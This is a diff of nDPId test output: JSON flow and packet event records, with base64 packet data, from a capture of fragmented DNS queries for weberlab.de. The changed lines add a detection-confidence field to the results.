-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1560869905222,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"ts_msec":1560869905222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"}
 02406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1560869905232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1494,"pkt_l4_len":1432,"ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyBaAsPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAAAQAABpoANdmxBspAOcKghQAAAQAEAAAAAQh3ZWJlcmxhYgJkZQAAMAABwAwAMAABAAAAPAIIAQEDCgMBAAHd7\/3tIq12CjsLWBAd1T3u8\/far4uZXvf8tV18qZaecv+cWqq5v63pRvKYMfBrDVtiIL4iSgCelIlOORESqB\/n89qn9klBRxVsJMHolsi2eBGR4aML4ghMfeD+DrMDSl5nWB3t\/K5Rz2vtzsqVvYGH0fZYQiit53gj6vP2hRbE0yO3UPkNpBEVogjAsm5eFjsLAaP0ZZzzOMrnzCiJQAYjOTVkDzZiOo2MwGKWKMlIXfR55yCA5TUPPR6V0HRZsrDK2l2G+6gzqDhIjqHbbSh9Mv77SdkkVNOUReABLpmnCFMwIuSy9nDEMQu7e65QyOF+NjUXziwKhrjnnJRY86s9znQCVnoPwAJ0m29NgBgpEN+9E19YVr3gF7esaT1ji4B10iyBf5c\/sJfg5vGTVg55+cxCbhI98aL2tYPM5kVyTpqgOlYRqnsMRfHPsinjRDh8+F+P0S5lhyLhG726D9NA5OQPW4cmRlbMrTiYPjcIRULbwVi5g\/NhRbX0rdr5mxRTcAGTp0WViThvS+0xXBiJtThFC5qIVMhS7ARjFwxTrtZNKOqapuPebbAbjMiTaX3UKD8DpFKbCouo5jaur0Y77zYiW3BcpU0K6hxkxrjqKblLAW1F4\/5zq+COo+NpOhgyLk8iw5Gla3a8V5hp3zZ0rXalprx16P2BcHZbPW3E+8AMADAAAQAAADwBCAEAAwoDAQAB0FTcKPFQrDtJ5jNrtzHKr9eDfOdVCwzO4X9R4tqKA65u0keHGEv6bXb0jFCRMqjwlEhdwpcP5pWLO2KaXz7wE8JcU09+0Wl0ULMFE0YeP9xrWD8WVyTq\/lq9p8H+EaptYpjYsQYpvmS1hYaPwkHSasoaoNlU\/KJ4LR1hW\/TaI5o69SF2XtC2BXJtHdXqAeWGgbQHEb4ZuNSn43I8KVu4w4jB+VtUYHn3jo\/JAZCCcY1fYvUwe6Y5pgL8PdSfLNBk0yaqPzkbAM0\/AR4N8urrCbUFR\/HszDBwRW47YHRiZTKI+JJ9SgZPCbY\/WcY0yGViKPdtj1W\/LEKo9CcrSzlOvcAMAC4AAQAAADwCHwAwCgIAAAA8XSexsF0AI8Ezewh3ZWJlcmxhYgJkZQDDZMohasNCzdZy+qXT+i9EuX\/inlaoHckoPQ6pZUM55HOKiXWwbCF2bgR2vTatltfgdQMYsjHLb9y8\/8K16x1bINo7jHhPhiQ3mZPnhRDbC819\/mg\/DAJlEfo4\/PIHroaOXHkEsxclA3Sfl5XzqMY8dIIjCMSIRohmpz3ajd1g8Q5nPhvruiTi3rbkkaFuvAu6JBazSxvplBTGRsLiwD\/keT1H0ch7BVc1oZ6xmkqy68vIsD63Fj1r1Prt7pmrCHTCuEgsO78D9dCQuWCLkJQxGUVXJj5CI3Hv7xFFgpu2WdK7EiEBH5rHphjb8hJPFep1cggzgdSO7gr4PL16UQJ4paFWEovlSSSKN6CqV0KlzY5UKpoC4bOcRMiiujkcgLRcJzDNjTcP59699eiRBYcnSUNu7NR\/AQOsLe1gcGBMYVI28uXABijFJJPUYQFFRKKQYYy7U8augfodJClNM+5PjDrN7VUaoyW\/CtbFigLZaje\/SbLFkod9oTkuhnetL7fyEnlGfxKmEZ218qPcsKDJRrRyymc+WdZ+tPcZvQXr6AVS7RZSoUTV\/+5dVd2kWuuF2w5rsnAIOU3wwIEPhsTwq9njhb9Bp9jOMH3FFbo4srNvY4pocOs9Lic1Os813bu7VyQz3Nrv\/xfPOPvvG\/\/ufcPEO13FnB7dwg\/ymTeeu8NjAC4AAQAAADwBHwAwCgIAAAA8XSexsF0AI8GQRwh3"}
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
+00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
 00783{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":368,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":368,"pkt_l4_len":0,"ts_msec":1560869905233,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyATosPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAFmAAABpplYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRNeoUG2ZbhJAUMEBAu7geapxJ7U1z+UqhkFSi8Qu6jROnMih5xzmixXOjO2RiHT8eMzQMHqilreexmdz+7rH4jCggpAg2YenRMzpvhrf0+OEWUNhwq6dNYVlNWg1Yf1oxCRsZ6Xiq2pemle4KOkgobWECgdELaMnIZKUJ0WtpAZJuCbAIPvak3YgHcNPR4Sbx1lKRTPW6QxjFsHJ5X\/B6mNMVtqG97wzaO\/ugVwH81Qt2Llpj5Wb873AtMbd7OQYLwhJ7fhxJ9xNJn6SlVRp6C+1P2Wyu\/7U0mgP+sAACkQAAAAgAAAHAAKABjxbObmL31GXCozdz5dCPwRZU4FwINgbJY="}
 00194{"basic_event_id":12,"basic_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":334}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1560869910534,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1560869910534,"pkt":"CFsOoYNeAAwpfKTLCABFAABQVdgAAEARt8DC9wUGwRjj7spPADUAPG1Sic4BIAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAADAAKAAgdxATcWA6WbA=="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1560869910547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAXc3KUgAEARC2fBGOPuwvcFBgA1yk8Gysn4ic6FAAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdJ7GwXQAjwTN7CHdlYmVybGFiAmRlAMNkyiFqw0LN1nL6pdP6L0S5f+KeVqgdySg9DqllQznkc4qJdbBsIXZuBHa9Nq2W1+B1AxiyMctv3Lz\/wrXrHVsg2juMeE+GJDeZk+eFENsLzX3+aD8MAmUR+jj88geuho5ceQSzFyUDdJ+XlfOoxjx0giMIxIhGiGanPdqN3WDxDmc+G+u6JOLetuSRoW68C7okFrNLG+mUFMZGwuLAP+R5PUfRyHsFVzWhnrGaSrLry8iwPrcWPWvU+u3umasIdMK4SCw7vwP10JC5YIuQlDEZRVcmPkIjce\/vEUWCm7ZZ0rsSIQEfmsemGNvyEk8V6nVyCDOB1I7uCvg8vXpRAniloVYSi+VJJIo3oKpXQqXNjlQqmgLhs5xEyKK6ORyAtFwnMM2NNw\/n3r316JEFhydJQ27s1H8BA6wt7WBwYExhUjby5cAGKMUkk9RhAUVEopBhjLtTxq6B+h0kKU0z7k+MOs3tVRqjJb8K1sWKAtlqN79JssWSh32hOS6Gd60vt\/ISeUZ\/EqYRnbXyo9ywoMlGtHLKZz5Z1n609xm9BevoBVLtFlKhRNX\/7l1V3aRa64XbDmuycAg5TfDAgQ+GxPCr2eOFv0Gn2M4wfcUVujiys29jimhw6z0uJzU6zzXdu7tXJDPc2u\/\/F884++8b\/+59w8Q7XcWcHt3CD\/KZN567w2MALgABAAAAPAEfADAKAgAAADxdJ7GwXQAjwZBHCHdlYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRM="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"ts_msec":1560869910547,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
 00684{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":292,"pkt_l4_len":0,"ts_msec":1560869910547,"pkt":"AAwpfKTLCFsOoYNeCABFAAEW3KUAuUARL3TBGOPuwvcFBl6hQbZluEkBQwQEC7uB5qnEntTXP5SqGQVKLxC7qNE6cyKHnHOaLFc6M7ZGIdPx4zNAweqKWt57GZ3P7usfiMKCCkCDZh6dEzOm+Gt\/T44RZQ2HCrp01hWU1aDVh\/WjEJGxnpeKral6aV7go6SChtYQKB0QtoychkpQnRa2kBkm4JsAg+9qTdiAdw09HhJvHWUpFM9bpDGMWwcnlf8HqY0xW2ob3vDNo7+6BXAfzVC3YuWmPlZvzvcC0xt3s5BgvCEnt+HEn3E0mfpKVVGnoL7U\/ZbK7\/tTSaA\/6wAAKRAAAACAAAAcAAoAGB3EBNxYDpZslD4VVl0I\/BakNFp6chM\/YQ=="}
 00193{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":42,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":258}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1560869913732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"ts_msec":1560869913732,"pkt":"CFsOoYNeAAwpfKTLht1gCfvPADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER7IYANQA07tw\/fwEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAEAACkCAAAAAAAAAA=="}
-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913732,"flow_last_seen":1560869913732,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1560869913732,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1560869913751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":134,"pkt_l4_len":80,"ts_msec":1560869913751,"pkt":"AAwpfKTLCFsOoYNeht1gDizvAFARPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXshgBQyy0\/f4GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAAcAAHADAAcAAEAAA4QABAgAQRwHwsWsAAAAAAKJgBTAAApBawAAAAAAAA="}
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
+00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1560869913751,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
 00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACgGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFggAAAAAoAJfUI5TAAACBATEBAIICoRF3zoAAAAAAQMDBw=="}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1560869913753,"pkt":"AAwpfKTLAAwpYjEqht1gBqwSACgGQCABBHAfCxawAAAAAAomAFMgAQRwHwsWsAIMKf\/+fKTLADXfAVwH8KghzRYJoBJeYK7OAAACBATEBAIIChJ809KERd86AQMDBw=="}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1560869913753,"pkt":"AAwpYjEqAAwpfKTLht1gD07UACAGQCABBHAfCxawAgwp\/\/58pMsgAQRwHwsWsAAAAAAKJgBT3wEANSHNFglcB\/CpgBAAv45LAAABAQgKhEXfOxJ809I="}
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869913753,"flow_last_seen":1560869913753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1560869913753,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
